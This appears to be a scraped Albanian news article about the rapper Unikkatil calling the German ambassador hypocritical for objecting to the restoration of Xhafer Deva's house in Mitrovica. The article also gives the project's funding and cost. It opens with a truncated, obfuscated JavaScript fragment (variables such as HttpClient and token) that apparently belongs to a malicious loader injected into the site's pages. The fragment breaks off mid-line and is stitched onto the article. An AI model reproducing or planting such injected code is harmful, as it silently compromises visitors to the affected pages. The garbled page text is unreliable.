;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Unikkatil reagon për debatin në lidhje me restaurimin e shtëpisë së Xhafer Devës

By

Politikani nga Mitrovica, Xhafer Deva, ka marrë vëmendje tash, gati 44 vjet pas vdekjes së tij. Pas gjithë kësaj kohe, Ministria e Kulturës në Kosovë ka marrë përsipër ta restaurojë shtëpinë e dikur ministrit të Punëve të Brendshme të Shqipërisë.

Ambasadori i Gjermanisë në Kosovë, Jorn Rohde, ka reaguar me shqetësim pas lajmit për restaurimin e shtëpisë së Xhafer Devës, duke treguar se ai kishte qenë bashkëpunëtor i nazistëve që e kryen Holokaustin, gjenocidin ndaj hebrenjve gjatë Luftës së Dytë Botërore.

Unikkatili i ka reaguar ambasadorit gjerman në Kosovë, Jorn Rohde, i cili u shpreh i shqetësuar të hënën lidhur me restaurimin e shtëpisë së Xhafer Devës në Mitrovicë.

Reperi e quajti hipokrit qëndrimin e diplomatit gjerman, i cili vlerësoi se Kosova po e shtrembëron të vërtetën për Holokaustin me restaurimin e shtëpisë së politikanit që kishte qenë bashkëpunëtor i nazistëve.

“Ambasador, a nuk do të thoni se është pak hipokrite të restaurohen monumentet naziste në Nuremberg dhe pastaj të bëheni krejt “i drejtë” për një ndërtesë që përfaqëson një pjesë të historisë për shqiptarët?”, shkroi ai.

“Ose kur jemi këtu, më kujtohet se Mynihu është plot me ndërtesa naziste dhe nuk shoh që dikush t’i rrëzojë ato. Restaurimi i një ndërtese historike nuk do të thotë që të jeni në anën e askujt, thjesht fshirja e historisë është gjithmonë një gabim”, shtoi ai.

Sipas Unikkatilit, Xhafer Deva kishte refuzuar t’ua dorëzonte hebrenjtë nazistëve.



Shtëpia e Devës është konsideruar monument i veçantë nga Kosova, që tash e disa vite që planifikon restaurimin e atij objekti. Restaurimi ka nisur këtë muaj në kuadër të programit “Trashëgimia kulturore si nxitëse për dialogun ndërkomunitar dhe kohezionin social”. Projekti i hartuar nga “CHwB Kosova” bashkëfinancohet nga Zyra e Instrumentit për Stabilitet dhe Paqe e Bashkimit Evropian dhe nga Ministria e Kulturës, Rinisë dhe Sportit. Implementimi bëhet nga UNDP-ja.

Kostoja e restaurimit është paraparë të jetë 300 mijë euro. /Prive.al

 

Artikuj të ngjashëm